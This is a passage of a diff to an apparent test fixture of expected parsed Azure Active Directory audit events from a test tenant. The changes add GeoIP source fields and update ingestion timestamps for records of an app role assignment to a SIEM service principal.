APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -15928,6 +16936,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -16094,7 +17114,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125324600Z", + "ingested": "2021-12-14T14:48:43.176737155Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -16121,6 +17141,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -16287,7 +17319,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125330300Z", + "ingested": "2021-12-14T14:48:43.176737733Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -16314,6 +17346,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -16480,7 +17524,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125335600Z", + "ingested": "2021-12-14T14:48:43.176738309Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -16507,6 +17551,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -16673,7 +17729,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125342100Z", + "ingested": "2021-12-14T14:48:43.176739091Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"V